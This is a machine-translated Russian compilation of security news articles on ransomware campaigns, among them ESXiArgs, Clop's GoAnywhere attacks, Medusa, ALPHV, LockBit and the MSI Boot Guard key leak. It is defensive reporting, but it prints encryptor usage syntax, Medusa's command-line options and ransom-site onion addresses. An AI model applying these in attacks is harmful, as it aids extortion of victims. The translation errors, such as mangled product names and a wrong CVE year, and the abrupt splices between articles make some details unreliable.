Масштабная атака программы-вымогателя ESXiArgs нацелена на серверы VMware ESXi по всему миру
Администраторы, хостинг-провайдеры и Французская группа реагирования на компьютерные чрезвычайные ситуации (CERT-FR) предупреждают, что злоумышленники активно нацелены на неисправленные серверы VMware ESXi против уязвимости удаленного выполнения кода двухлетней давности для развертывания новой программы-вымогателя ESXiArgs.
Уязвимость, отслеживаемая как CVE-2021-21974, вызвана проблемой переполнения динамической памяти в службе OpenSLP, которая может быть использована злоумышленниками, не прошедшими проверку подлинности, в атаках низкой сложности.
«По данным текущих расследований, эти кампании атак, по-видимому, используют уязвимость CVE-2021-21974, исправление для которой доступно с 23 февраля 2021 года», — говорится в сообщении CERT-FR.
«В настоящее время целевыми системами будут гипервизоры ESXi версии 6.x и ранее 6.7».
Чтобы блокировать входящие атаки, администраторы должны отключить уязвимую службу протокола определения местоположения службы (SLP) на гипервизорах ESXi, которые еще не были обновлены.
CERT-FR настоятельно рекомендует установить исправление как можно скорее, но добавляет, что системы, оставшиеся без исправлений, также следует сканировать на наличие признаков компрометации.
CVE-2021-21974 влияет на следующие системы:
ESXi версии 7.x до ESXi70U1c-17325551
ESXi версии 6.7.x до ESXi670-202102401-SG
ESXi версии 6.5.x до ESXi650-202102101-SG
Французский поставщик облачных услуг OVHcloud впервые опубликовал отчет, в котором эта массовая волна атак, нацеленных на серверы VMware ESXi, была связана с операцией программы-вымогателя в Неваде.
«По мнению экспертов из экосистемы, а также властей, они могут быть связаны с программой-вымогателем из Невады и используют CVE-2021-21974 в качестве вектора компрометации. Расследование для подтверждения этих предположений все еще продолжается», — сказал директор по информационной безопасности OVHcloud Жюльен Леврард.
«Атака в первую очередь нацелена на серверы ESXi версии до 7.0 U3i, очевидно, через порт OpenSLP (427)».
Однако вскоре после того, как наша история была опубликована, компания отступила, заявив, что они объяснили это неправильной операцией программы-вымогателя.
В конце первого дня атак было зашифровано около 120 серверов ESXi.
Однако за выходные их число быстро выросло: по данным Censys, 2400 устройств VMware ESXi по всему миру в настоящее время обнаружены как скомпрометированные в ходе кампании по вымогательству.
В бюллетене, опубликованном 6 февраля, VMware подтвердила, что эта атака использует старые недостатки ESXi, а не уязвимость нулевого дня.
Компания советует администраторам установить последние обновления для серверов ESXi и отключить службу OpenSLP, которая отключена по умолчанию с 2021 года.
В целом, кампания по вымогательству не имела большого успеха, учитывая большое количество зашифрованных устройств: служба отслеживания платежей выкупа Ransomwhere сообщила только о четырех платежах выкупа на общую сумму 88 000 долларов США.
Отсутствие выкупа, вероятно, связано с руководством по восстановлению VMware ESXi, созданным исследователем безопасности Энесом Сонмезом, которое позволяет многим администраторам бесплатно перестраивать свои виртуальные машины и восстанавливать свои данные.
Новый вымогатель ESXiArgs
Однако, судя по примечаниям о выкупе, обнаруженным в этой атаке, они не связаны с программой-вымогателем Nevada, а относятся к новому семейству программ-вымогателей.
Примерно четыре часа назад жертвы этой кампании также начали сообщать об атаках на форуме BleepingComputer, прося помощи и дополнительной информации о том, как восстановить свои данные.
Программа-вымогатель шифрует файлы с расширениями .vmxf, .vmx, .vmdk, .vmsd и .nvram на скомпрометированных серверах ESXi и создает файл .args для каждого зашифрованного документа с метаданными (вероятно, необходимыми для расшифровки).
В то время как субъекты угрозы, стоящие за этой атакой, утверждают, что украли данные, одна жертва сообщила на форумах BleepingComputer, что в их инциденте этого не было.
«Наше расследование показало, что данные не были заражены. В нашем случае на атакованной машине было более 500 ГБ данных, но обычное ежедневное использование составляло всего 2 Мбит/с. Мы просмотрели статистику трафика за последние 90 дней и не обнаружили доказательств исходящих данных. перевод", - сказал админ.
Жертвы также нашли заметки о выкупе под названием «ransom.html» и «Как восстановить ваши файлы.html» в заблокированных системах. Другие сказали, что их заметки представляют собой текстовые файлы.
Майкл Гиллеспи из ID Ransomware в настоящее время отслеживает программу-вымогатель под именем «ESXiArgs», но сообщил BleepingComputer, что, пока мы не найдем образец, невозможно определить, есть ли у него какие-либо недостатки в шифровании.
BleepingComputer имеет специальную тему поддержки ESXiArgs, где люди сообщают о своем опыте с этой атакой и получают помощь в восстановлении машин.
Технические детали ESXiArgs
Прошлой ночью администратор получил копию шифровальщика ESXiArgs и связанного сценария оболочки и поделился им в теме поддержки BleepingComputer.
Анализ скрипта и шифровальщика позволил нам лучше понять, как проводились эти атаки.
При взломе сервера в папке /tmp сохраняются следующие файлы:
encrypt — исполняемый файл ELF-шифровальщика.
encrypt.sh — сценарий оболочки, который действует как логика атаки, выполняя различные задачи перед запуском шифровальщика, как описано ниже.
public.pem — открытый ключ RSA, используемый для шифрования ключа, который шифрует файл.
motd — примечание о выкупе в текстовом виде, которое будет скопировано в /etc/motd, чтобы оно отображалось при входе в систему. Исходный файл сервера будет скопирован в /etc/motd1.
index.html — примечание о выкупе в формате HTML, которое заменит домашнюю страницу VMware ESXi. Исходный файл сервера будет скопирован в index1.html в той же папке.
Майкл Гиллеспи из ID Ransomware проанализировал шифровальщик и сообщил BleepingComputer, что шифрование, к сожалению, безопасно, а это означает, что никакие криптографические ошибки не позволяют дешифровать.
«Открытый.pem, который он ожидает, является открытым ключом RSA (я предполагаю, что это RSA-2048, основанный на просмотре зашифрованных файлов, но код технически принимает любой действительный PEM)», — написал Гиллеспи в теме поддержки на форуме.
«Для файла для шифрования он генерирует 32 байта с использованием защищенного CPRNG RAND_pseudo_bytes OpenSSL, а затем этот ключ используется для шифрования файла с использованием Sosemanuk, безопасного потокового шифра. Ключ файла шифруется с помощью RSA (OpenSSL RSA_public_encrypt) и добавляется к конец файла».
«Использование алгоритма Sosemanuk довольно уникально и обычно используется только в программах-вымогателях, полученных из исходного кода Babuk (вариант ESXi). Возможно, это так, но они модифицировали его для использования RSA вместо реализации Babuk Curve25519».
Этот анализ показывает, что ESXiArgs, вероятно, основан на утечке исходного кода Babuk, который ранее использовался другими кампаниями по вымогательству ESXi, такими как CheersCrypt и шифровальщик PrideLocker группы Quantum/Dagon.
Хотя примечания о выкупе для ESXiArgs и Cheerscrypt очень похожи, метод шифрования отличается, поэтому неясно, является ли это новым вариантом или просто общей кодовой базой Babuk.
Шифровальщик выполняется файлом сценария оболочки, который запускает его с различными аргументами командной строки, включая файл с открытым ключом RSA, файл для шифрования, фрагменты данных, которые не будут зашифрованы, размер блока шифрования и файл. размер.
usage: encrypt <public_key> <file_to_encrypt> [<enc_step>] [<enc_size>] [<file_size>]
enc_step - number of MB to skip while encryption
enc_size - number of MB in encryption block
file_size - file size in bytes (for sparse files)
Этот шифратор запускается с помощью сценария оболочки encrypt.sh, который действует как логика атаки, которую мы кратко опишем ниже.
При запуске сценарий выполнит следующую команду для изменения файлов конфигурации виртуальной машины ESXi (.vmx), чтобы строки «.vmdk» и «.vswp» были изменены на «1.vmdk» и «1.vswp».
Новая версия программы-вымогателя ESXiArgs препятствует восстановлению VMware ESXi
Новые атаки программ-вымогателей ESXiArgs теперь шифруют большие объемы данных, что значительно усложняет, если не делает невозможным, восстановление зашифрованных виртуальных машин VMware ESXi.
В прошлую пятницу массированная и широко распространенная автоматизированная атака программ-вымогателей зашифровала более 3000 серверов VMware ESXi, доступных в Интернете, с помощью новой программы-вымогателя ESXiArgs.
В предварительных отчетах указывалось, что устройства были взломаны с использованием старых уязвимостей VMware SLP. Однако некоторые жертвы заявили, что SLP был отключен на их устройствах и все еще был взломан и зашифрован.
При шифровании устройства скрипт encrypt.sh ищет файлы виртуальной машины, соответствующие следующим расширениям:
Для каждого найденного файла скрипт проверяет размер файла и, если размер файла меньше 128 МБ, шифрует весь файл с шагом 1 МБ.
Однако для файлов размером более 128 МБ будет вычисляться «size_step», что заставит шифровальщик попеременно шифровать 1 МБ данных и не шифровать фрагменты (size_step в мегабайтах) данных.
Сценарий encrypt.sh использует следующую формулу (слегка измененную для удобочитаемости), чтобы определить, какой size_step следует использовать:
size_step=((($size_in_kb/1024/100)-1))
Это означает, что для файла размером 4,5 ГБ он будет генерировать size_step равным «45», заставляя шифровальщик чередовать шифрование 1 МБ файла и пропуск 45 МБ файла. Итак, как вы можете видеть, довольно много данных остается незашифрованным к моменту завершения шифрования файла.
Для еще больших файлов, таких как файл размером 450 ГБ, объем пропущенных данных резко возрастает, при этом size_step становится равным «4607», теперь чередуется шифрование 1 МБ и пропуск 4,49 ГБ данных.
Из-за этих больших фрагментов незашифрованных данных исследователи разработали метод восстановления виртуальных машин с использованием больших и в основном незашифрованных плоских файлов, в которых хранятся данные диска виртуальной машины.
Сценарий, созданный CISA, позже автоматизировал этот процесс восстановления.
Процесс шифрования изменен
К сожалению, сегодня началась вторая волна программ-вымогателей ESXiArgs, которые включают в себя модифицированную процедуру шифрования, которая шифрует гораздо больше данных в больших файлах.
BleepingComputer впервые узнал о второй волне после того, как администратор опубликовал в теме поддержки ESXiArgs сообщение о том, что их сервер был зашифрован и не может быть восстановлен с помощью методов, которые работали ранее.
Поделившись образцами с BleepingComputer, мы заметили, что шифратор не изменился, но подпрограмма size_step скрипта encrypt.sh была удалена и просто установлена в 1 в новой версии.
Это изменение проиллюстрировано ниже в сравнении исходного вычисления size_step encrypt.sh (слева) в первой волне атак с новым сценарием оболочки (справа) во второй волне.
Эксперт по программам-вымогателям Майкл Гиллеспи сообщил, что это изменение заставляет шифровальщик чередовать шифрование 1 МБ данных и пропуск 1 МБ данных.
Все файлы размером более 128 МБ теперь будут иметь 50% зашифрованных данных, что делает их, вероятно, невосстановимыми.
Это изменение также препятствует успешному восстановлению машин предыдущими инструментами восстановления, поскольку в плоских файлах будет слишком много зашифрованных данных, чтобы их можно было использовать.
Эта вторая волна атаки также внесла незначительные изменения в примечание о выкупе, больше не включая биткойн-адреса в примечание о выкупе, как показано ниже.
Удаление биткойн-адресов, вероятно, произошло из-за того, что они были собраны исследователями безопасности для отслеживания выплат выкупа.
Однако, что еще более тревожно, администратор, который поделился новыми образцами, сказал, что SLP отключен на их сервере, но все равно снова взломан. Они также проверили наличие бэкдора vmtool.py, замеченного в предыдущих атаках, и не нашли его.
С отключенным SLP становится еще более запутанным вопрос о том, как этот сервер был взломан.
BleepingComputer по-прежнему рекомендует пытаться восстановить зашифрованные серверы ESXi с помощью сценария восстановления CISA.
Однако он, скорее всего, больше не будет работать, если вы были заражены во время второй волны атак с использованием новой процедуры шифрования.
Clop Ransomware утверждает, что он атаковал 130 организаций, используя goanywhere zeryday
Кибергруппа Clop утверждает, что стоит за недавними атаками, которые использовали уязвимость в нулевом дне в инструменте Googhwhere MFT Secure File Transform, заявив, что они украли данные из более чем 130 организаций.
Недостаток безопасности, который теперь отслеживается как CVE-2023-0669, позволяет злоумышленникам получить удаленное выполнение кода на непропатченных экземплярах GoAnywhere MFT с их административной консолью, подверженной доступу в Интернете.
Clop обратился к BleepingComputer и сказал нам, что они якобы украли данные в течение десяти дней после нарушения уязвимых серверов для использования таргетинга этой ошибки.
Они также утверждали, что они могут перемещаться по боковым направлениям через сети своих жертв и развернуть полезные нагрузки вымогателей, чтобы зашифровать системы, но решили не делать этого и только украли документы, хранящиеся на скомпрометированных GoAnywhere MFT.
Группа отказалась предоставить доказательства или поделиться дополнительной информацией о своих вторжения, когда BleepingComputer спросил их, когда начались атаки, если они уже начали вымогать своих жертв, и какие выкупы они просили.
BleepingComputer не мог самостоятельно подтвердить действия Clop, и Forta не ответил на электронные письма с просьбой получить дополнительную информацию о эксплуатации CVE-2013-0669 и обвинениях группы вымогателей,
Разработчик Goanywhere MFT Fortra (ранее известный как Helpsystems) на прошлой неделе сообщил своим клиентам, что уязвимость эксплуатируется как нулевой день в дикой природе.
На следующий день компания выпустила обновления аварийной безопасности, чтобы позволить клиентам защитить свои серверы от входящих попыток атаки.
«Мы определили, что несанкционированная сторона получила доступ к системам через ранее неизвестный эксплойт и создала несанкционированные учетные записи пользователей», - сказал Fortra.
CISA также добавил уязвимость CVE-2023-0669 Goanywhere MFT в свой известный каталог эксплуатируемых уязвимостей в пятницу, приказывая федеральным агентствам исправлять свои системы в течение следующих трех недель, до 3 марта.
В то время как Shodan показывает, что более 1000 экземпляров Goanywhere, доступных из интернета, только 135 находятся на портах 8000 и 8001 (те, которые используются уязвимой консоли администратора).
Clop Ransomware требует выкуп у жертв нулевого дня GoAnywhere
Clop требует выкуп у компаний, чьи данные были украдены с помощью уязвимости нулевого дня в решении для безопасного обмена файлами Fortra GoAnywhere MFT.
В феврале разработчики решения для передачи файлов GoAnywhere MFT предупредили клиентов о том, что на открытых административных консолях используется уязвимость нулевого дня для удаленного выполнения кода.
GoAnywhere — это решение для безопасной передачи файлов через Интернет, которое позволяет компаниям безопасно передавать зашифрованные файлы своим партнерам, сохраняя при этом подробные журналы аудита того, кто получил доступ к файлам.
Хотя никаких подробностей о том, как использовалась уязвимость, не сообщалось, вскоре был выпущен экспериментальный эксплойт, а затем исправление для этой уязвимости.
На следующий день после выпуска патча GoAnywhere кибергруппа Clop заявила, что несет ответственность за атаки.
Группа заявила, что они использовали уязвимость в течение десяти дней, чтобы украсть данные у 130 компаний.
С тех пор две компании, Community Health Systems (CHS) и Hatch Bank, сообщили, что данные были украдены в ходе атак GoAnywhere MFT.
Клоп начинает вымогать деньги у клиентов GoAnywhere
Недавно Clop начал публично эксплуатировать жертв атак GoAnywhere, добавив семь новых компаний на свой сайт утечки данных.
Общеизвестно, что только одна из жертв, Hatch Bank, была взломана с помощью этой уязвимости.
Хотя неясно, сколько требуют злоумышленники, ранее в декабре 2020 года они требовали выкуп в размере 10 миллионов долларов в аналогичных атаках с использованием уязвимости нулевого дня Accellion FTA.
Во время этих атак группа вымогателей украла большие объемы данных почти у 100 компаний по всему миру, при этом злоумышленники медленно сливали данные из компаний, требуя выкупа в миллионы долларов.
В число организаций, чьи серверы Accellion были взломаны, входят, среди прочего, энергетический гигант Shell, фирма по кибербезопасности Qualys, гигант супермаркетов Kroger и несколько университетов по всему миру, таких как Стэнфордский медицинский университет, Университет Колорадо, Университет Майами, Калифорнийский университет и Университет Мэриленда. Балтимор (UMB).
Кибергруппа Medusa набирает обороты, атакуя компании по всему миру
Medusa Ransomware, начала набирать обороты в 2023 году, нацеленная на корпоративных жертв по всему миру с требованиями выкупа на миллионы долларов.
Операция «Медуза» началась в июне 2021 года, но ее активность была относительно низкой, жертв было немного. Однако в 2023 году группа активизировалась и запустила «блог Медузы», используемый для утечки данных о жертвах, отказавшихся платить выкуп.
На этой неделе Medusa привлекла внимание СМИ после того, как они взяли на себя ответственность за нападение на район государственных школ Миннеаполиса (MPS) и поделились видео с украденными данными.
Многие семейства вредоносных программ называют себя Medusa, в том числе ботнет на основе Mirai с возможностями вымогателей, вредоносное ПО Medusa для Android и широко известная операция вымогателей MedusaLocker.
Из-за часто используемого имени были некоторые запутанные отчеты об этом семействе программ-вымогателей, и многие думали, что это то же самое, что и MedusaLocker.
Однако действия программ-вымогателей Medusa и MedusaLocker совершенно разные.
Операция MedusaLocker была запущена в 2019 году как Ransomware-as-a-Service с многочисленными аффилированными лицами, запиской о выкупе, обычно называемой How_to_back_files.html, и широким спектром расширений файлов для зашифрованных файлов.
Операция MedusaLocker использует для переговоров веб-сайт Tor по адресу qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion.
Однако операция по вымогательству Medusa началась примерно в июне 2021 года и использовала записку с требованием выкупа под названием !!!READ_ME_MEDUSA!!!.txt и статическое зашифрованное расширение файла .MEDUSA.
Операция Medusa также использует веб-сайт Tor для переговоров о выкупе, но их сайт находится по адресу medusacegu2ufmc3kx2kkqicrlcxdettsjcenhjena6uannk5f4ffuyd.onion.
Как Medusa шифрует Windows-устройства
BleepingComputer смог проанализировать шифратор Medusa только для Windows, и пока неизвестно, есть ли у них такой шифратор для Linux.
Шифровальщик Windows принимает параметры командной строки, которые позволяют злоумышленнику настроить способ шифрования файлов на устройстве, как показано ниже.
# Command Line
Option | Description
-V | Get version
-d | Do not delete self
-f | Exclude system folder
-i | In path
-k | Key file path
-n | Use network
-p | Do not preprocess (preprocess = kill services and shadow copies)
-s | Exclude system drive
-t | Note file path
-v | Show console window
-w | Initial run powershell path (powershell -executionpolicy bypass -File %s)
При обычном запуске без аргументов командной строки программа-вымогатель Medusa завершит работу более 280 служб и процессов Windows для программ, которые могут препятствовать шифрованию файлов. К ним относятся службы Windows для почтовых серверов, серверов баз данных, серверов резервного копирования и программного обеспечения для обеспечения безопасности.
Затем программа-вымогатель удалит теневые копии томов Windows, чтобы предотвратить их использование для восстановления файлов.
Эксперт по программам-вымогателям Майкл Гиллеспи также проанализировал шифровальщик и сообщил BleepingComputer, что он шифрует файлы, используя шифрование AES-256 + RSA-2048 с использованием библиотеки BCrypt.
Гиллеспи также подтвердил, что метод шифрования, используемый в Medusa, отличается от метода, используемого в MedusaLocker.
При шифровании файлов программа-вымогатель будет добавлять расширение .MEDUSA к именам зашифрованных файлов
В каждой папке программа-вымогатель создаст заметку о выкупе с именем !!!READ_ME_MEDUSA!!!.txt, содержащую информацию о том, что случилось с файлами жертвы.
Записка о выкупе также будет включать контактную информацию расширения, в том числе сайт утечки данных Tor, сайт переговоров Tor, канал Telegram, идентификатор Tox и адрес электронной почты [email protected].
В качестве дополнительного шага, чтобы предотвратить восстановление файлов из резервных копий, программа-вымогатель Medusa выполнит следующую команду, чтобы удалить локально сохраненные файлы, связанные с программами резервного копирования, такими как Windows Backup. Эта команда также удалит виртуальные жесткие диски (VHD), используемые виртуальными машинами.
Программа-вымогатель New Money Message требует выкуп в миллион долларов
Появилась новая кибергруппа под названием «Money Message», нацеленная на жертв по всему миру и требующая выкупа в миллионы долларов за то, чтобы не произошла утечка данных и за выпуск дешифратора.
О новой программе-вымогателе впервые появилось сообщение на форумах BleepingComputer 28 марта 2023 года, а ThreatLabz Zscaler вскоре после публикации информации в Twitter.
В настоящее время злоумышленник перечисляет на своем сайте вымогателей двух жертв, одной из которых является азиатская авиакомпания с годовым доходом около 1 миллиарда долларов. Кроме того, злоумышленники утверждают, что украли у компании файлы, и в качестве доказательства нарушения прикрепляют скриншот файловой системы, к которой был получен доступ.
Как Money Message шифрует компьютер
Шифровальщик написан на C++ и включает в себя встроенный файл конфигурации JSON, определяющий способ шифрования устройства.
Этот файл конфигурации включает в себя, какие папки блокировать от шифрования, какое расширение добавлять, какие службы и процессы следует завершать, включено ли ведение журнала, а также имена и пароли для входа в домен, которые, вероятно, используются для шифрования других устройств.
В образце, проанализированном BleepingComputer, программа-вымогатель не будет шифровать файлы в следующих папках:
При шифровании файлов расширение не добавляется, но это может измениться в зависимости от жертвы. По словам исследователя безопасности, шифровальщик использует шифрование ChaCha20/ECDH при шифровании файлов.
Единственными файлами, исключенными из шифрования по умолчанию, являются:
После шифрования устройства программа-вымогатель создаст записку с требованием выкупа с именем money_message.log, содержащую ссылку на сайт переговоров TOR, используемый для переговоров с злоумышленниками.
Программа-вымогатель также предупредит, что опубликует любые украденные данные на своем сайте утечки данных, если выкуп не будет выплачен.
Хотя шифратор, используемый группой, не выглядит сложным, было подтверждено, что операция успешно крадет данные и шифрует устройства во время их атак.
ALPHV использует ошибки Veritas Backup Exec для первоначального доступа
Было замечено, что операторы ALPHV/BlackCat использует три уязвимости, влияющие на продукт Veritas Backup для начального доступа к целевой сети.
Операция по вымогательству ALPHV началась в декабре 2021 года и, как считается, управляется бывшими участниками программ Darkside и Blackmatter, которые были внезапно закрыты, чтобы избежать давления со стороны правоохранительных органов.
Mandiant отслеживает филиал ALPHV как «UNC4466» и отмечает, что этот метод представляет собой отклонение от типичного вторжения, основанного на украденных учетных данных.
Используемые недостатки
Mandiant сообщает, что 22 октября 2022 года она наблюдала первые случаи эксплуатации уязвимостей Veritas в дикой природе. Уязвимости с высокой степенью серьезности, на которые нацелен UNC4466:
CVE-2021-27876: Уязвимость произвольного доступа к файлам, вызванная ошибкой в схеме аутентификации SHA, позволяет удаленному злоумышленнику получить несанкционированный доступ к уязвимым конечным точкам. (оценка CVSS: 8,1)
CVE-2021-27877: Удаленный несанкционированный доступ и выполнение привилегированных команд агенту BE через аутентификацию SHA. (оценка CVSS: 8,2)
CVE-2021-27878: Уязвимость выполнения произвольной команды возникает из-за ошибки в схеме аутентификации SHA, что позволяет удаленному злоумышленнику получить несанкционированный доступ к уязвимым конечным точкам. (оценка CVSS: 8,8)
Все три недостатка влияют на программное обеспечение Veritas Backup. Поставщик раскрыл их в марте 2021 года и выпустил исправление с версией 21.2. Однако, несмотря на то, что с тех пор прошло более двух лет, многие конечные точки остаются уязвимыми, поскольку они не обновлены до безопасной версии.
Mandiant говорит, что коммерческая служба сканирования показала, что в общедоступной сети есть более 8500 IP-адресов, которые рекламируют службу «Symantec/Veritas Backup Exec ndmp» на порту по умолчанию 10000, а также на портах 9000 и 10001.
«Хотя этот результат поиска не идентифицирует напрямую уязвимые системы, поскольку версии приложений не удалось идентифицировать, он демонстрирует преобладание экземпляров, открытых в Интернете, которые потенциально могут быть исследованы злоумышленниками», — Mandiant.
Модуль Metasploit для использования этих уязвимостей был выпущен для публики 23 сентября 2022 года. Код позволяет злоумышленникам создавать сеанс и взаимодействовать с взломанными конечными точками.
Согласно Mandiant, UNC4466 начал использовать конкретный модуль через месяц после того, как он стал доступен.
Детали атаки
Согласно наблюдениям Mandiant, UNC4466 компрометирует открытый в Интернете сервер Windows, на котором работает Veritas Backup Exec, с помощью общедоступного модуля Metasploit и поддерживает постоянный доступ к хосту.
После первоначальной компрометации злоумышленник использовал утилиты Advanced IP Scanner и ADRecon для сбора информации о среде жертвы.
Затем они загрузили на хост дополнительные инструменты, такие как LAZAGNE, LIGOLO, WINSW, RCLONE и, наконец, шифровальщик вымогателя ALPHV через фоновую интеллектуальную службу передачи (BITS).
Злоумышленник использовал туннелирование SOCKS5 для связи с сервером управления и контроля (C2).
Исследователи объясняют, что UNC4466 использовал передачу BITS для загрузки инструментов туннелирования SOCKS5 и развернул полезную нагрузку программы-вымогателя, добавив немедленные задачи в политику домена по умолчанию, отключив программное обеспечение безопасности и запустив шифратор.
Чтобы повысить привилегии, UNC4466 использует Mimikatz, LaZagne и Nanodump для кражи действительных учетных данных пользователя.
Наконец, субъект угрозы уклоняется от обнаружения, очищая журналы событий и отключая функцию мониторинга Microsoft Defender в реальном времени.
Отчет Mandiant содержит рекомендации, которым защитники могут следовать, чтобы своевременно обнаруживать атаки UNC4466 и смягчать их до того, как полезная нагрузка ALPHV будет выполнена в их системах.
Обнаружены программы-шифровальщики LockBit, нацеленные на устройства Mac
LockBit впервые создала шифровальщики, нацеленные на Mac, что, вероятно, станет первой крупной операцией по вымогательству, специально предназначенной для macOS.
Новые шифровальщики были обнаружены исследователем кибербезопасности MalwareHunterTeam, который нашел на VirusTotal ZIP-архив, который, по-видимому, содержал большинство доступных шифровальщиков LockBit.
Исторически сложилось так, что операция LockBit использует шифраторы, предназначенные для атак на серверы Windows, Linux и VMware ESXi. Однако, как показано ниже, этот архив [VirusTotal] также содержал ранее неизвестные шифраторы для процессоров macOS, ARM, FreeBSD, MIPS и SPARC.
Эти шифраторы также включают один с именем «locker_Apple_M1_64» [VirusTotal], который нацелен на более новые компьютеры Mac, работающие на Apple Silicon. В архиве также есть локеры для процессоров PowerPC, которые используют старые Mac.
Дальнейшее исследование, проведенное исследователем кибербезопасности Флорианом Ротом, обнаружило шифратор Apple M1, загруженный на VirusTotal в декабре 2022 года, что указывает на то, что эти образцы уже некоторое время циркулируют.
Microsoft объяснила недавние атаки на серверы Papercut к операциям вымогателей Clop и Lockbit, которые использовали уязвимости для кражи корпоративных данных.
В прошлом месяце на сервере приложений PaperCut были исправлены две уязвимости, которые позволяют удаленным злоумышленникам произвести неавторизованное выполнение удаленного кода и раскрытие информации:
CVE-2023–27350 / ZDI-CAN-18987 / PO-1216: Недостоверное избавление от удаленного выполнения кода, влияющее на все версии Papercut MF или NG 8.0 или более поздней версии на всех платформах ОС, как для серверов применения, так и для серверов сайта. (CVSS v3.1 Оценка: 9,8 - критическая)
CVE-2023–27351 / ZDI-CAN-19226 / PO-1219: Недостаточный недостаток информации о раскрытии информации, влияющий на все версии Papercut MF или NG 15.0 или позже на платформах ОС для серверов приложений. (CVSS v3.1 Оценка: 8,2 - высокая)
19 апреля PaperCut сообщил, что эти недостатки активно эксплуатировались в дикой природе, призывая администраторов обновить свои серверы до последней версии.
Сегодня Microsoft сообщила, что Clop и Lockbit стоит за этими атаками и используют их для кражи корпоративных данных с уязвимых серверов.
После того, как они получили доступ к серверу, они развернули вредоносное ПО TrueBot, которая также была ранее связана с операцией вымогателей Clop.
В конечном счете, Microsoft говорит, что маяк Cobalt Strike был развернут и использовался для распространения в боковом направлении через сеть при краже данных с использованием приложения Megasync File.
В дополнение к CLOP, Microsoft говорит, что некоторые вторжения привели к атакам вымогателей Lockbit. Тем не менее, неясно, начались ли эти атаки после того, как эксплойты были опубликованы.
Microsoft рекомендует администраторам применять доступные патчи как можно скорее, так как другие актеры угроз, вероятно, начнут использовать уязвимости.
PaperCut включает в себя функцию «архивирования печати», которая сохраняет все задания печати и документы, отправленные через сервер, что делает ее хорошим кандидатом на атаки эксфильтрации данных от операции.
Все организации, использующие Papercut MF или NG, настоятельно рекомендуются перейти на версии 20.1.7, 21.2.11 и 22.0.9 немедленно и позже, чтобы исправить эти уязвимости.
расследует утечку предполагаемых закрытых ключей, используемых функцией безопасности Intel Boot Guard, что может повлиять на ее способность блокировать установку вредоносного встроенного ПО UEFI на устройства MSI.
В марте группа ransomware атаковала компьютерное оборудование производителя MSI, заявив, что во время атаки украла 1,5 ТБ данных, включая прошивку, исходный код и базы данных.
Злоумышленники потребовали выкуп в размере 4 000 000 долларов и, не получив денег, начала сливать данные для MSI на своем сайте утечки данных.
На прошлой неделе злоумышленники начали утечку украденных данных MSI, включая исходный код прошивки, используемой материнскими платами компании.
Intel Boot Guard пострадал от атаки
В пятницу Алекс Матросов, генеральный директор платформы безопасности цепочки поставок микропрограмм Binarly, предупредил, что утечка исходного кода содержит закрытые ключи для подписи изображений для 57 продуктов MSI и закрытые ключи Intel Boot Guard для 116 продуктов MSI.
«Компания Intel знает об этих отчетах и ведет активное расследование. Исследователи утверждают, что в данные включены закрытые ключи подписи, в том числе ключи подписи MSI OEM для Intel® BootGuard», — сообщила Intel BleepingComputer в ответ на наши вопросы об утечке.
«Следует отметить, что OEM-ключи Intel BootGuard генерируются производителем системы и не являются ключами подписи Intel».
Матросов сказал, что эта утечка могла привести к тому, что Intel Boot Guard не работал на устройствах MSI, использующих процессоры «11th Tiger Lake, 12th Adler Lake и 13th Raptor Lake».
«У нас есть доказательства того, что эта утечка данных MSI затронула всю экосистему Intel. Это прямая угроза для клиентов MSI и, к сожалению, не только для них», — сказал Матросов BleepingComputer в пятницу днем.
«Ключи подписи для образа fw позволяют злоумышленнику создавать вредоносные обновления прошивки, и они могут быть доставлены с помощью обычного процесса обновления BIOS с помощью инструментов обновления MSI».
«Утечка ключей Intel Boot Guard влияет на всю экосистему (не только на MSI) и делает эту функцию безопасности бесполезной».
Intel Boot Guard — это функция безопасности, встроенная в современное оборудование Intel, предназначенная для предотвращения загрузки вредоносных прошивок, известных как буткиты UEFI. Это критически важная функция, используемая для удовлетворения требований Windows UEFI Secure Boot.
Это связано с тем, что вредоносная прошивка загружается до загрузки операционной системы, что позволяет ей скрыть свою деятельность от ядра и программного обеспечения безопасности, сохраняется даже после переустановки операционной системы и помогает установить вредоносное ПО на скомпрометированные устройства.
Для защиты от вредоносной микропрограммы Intel Boot Guard проверяет, подписан ли образ микропрограммы с помощью законного закрытого ключа подписи с использованием встроенного открытого ключа, встроенного в оборудование Intel.
Если микропрограмму можно проверить как законно подписанную, Intel Boot Guard разрешит ее загрузку на устройство. Однако, если подпись не пройдена, прошивка не сможет загрузиться.
Самая большая проблема с этой утечкой заключается в том, что открытые ключи, используемые для проверки прошивки, подписанной с использованием утекших ключей, как полагают, встроены в оборудование Intel. Если их нельзя изменить, функция безопасности больше не заслуживает доверия на устройствах, использующих эти украденные ключи.
«В утечке исходного кода MSI были обнаружены закрытые ключи манифеста (KM) и манифеста политики загрузки (BPM). Эти ключи используются для технологии Boot Guard, которая обеспечивает проверку образа прошивки с помощью аппаратного корня доверия», — предупреждает Binarly в бюллетене. поделился в Твиттере.
«Хеш открытого ключа OEM Root RSA от менеджера KM запрограммирован в программируемом поле набора микросхем (FPF). Основная цель KM — сохранить хэш открытого ключа RSA из BPM, который, в свою очередь, содержит информацию о загрузке Политика, описание начального загрузочного блока (IBB) и его хэш».
«Утечка закрытых частей упомянутых ключей позволяет потенциальному злоумышленнику подписать модифицированную прошивку для этого устройства, чтобы оно прошло проверку Intel Boot Guard, что делает эту технологию полностью неэффективной».
Хотя эти ключи вряд ли помогут большинству злоумышленников, некоторые опытные злоумышленники ранее использовали в атаках вредоносные микропрограммы, такие как вредоносное ПО CosmicStrand и BlackLotus UEFI.
«Теперь эта функция может быть скомпрометирована, и злоумышленники могут создавать вредоносные обновления прошивки на затронутых устройствах, не беспокоясь об Intel Boot Guard», — сказал Матросов в последнем предупреждении, которым поделился с BleepingComputer.
Binarly опубликовала список затронутого оборудования MSI, включающий 116 устройств MSI, которые, как сообщается, были скомпрометированы утечкой ключей Intel Boot Guard.
Код Babuk, используемый 9 группами ransomware для шифрования серверов VMWare ESXi
Все большее число операций с программами-вымогателями используют просочившийся исходный код программы-вымогателя Babuk для создания шифровальщиков Linux, нацеленных на серверы VMware ESXi.
Исследователи безопасности SentinelLabs заметили эту растущую тенденцию после того, как заметили быструю смену девяти вариантов программ-вымогателей на основе Babuk, появившихся в период между второй половиной 2022 года и первой половиной 2023 года.
«Существует заметная тенденция к тому, что злоумышленники все чаще используют конструктор Babuk для разработки программ-вымогателей для ESXi и Linux», — сказал Алекс Деламотт, исследователь угроз из SentinelLabs.
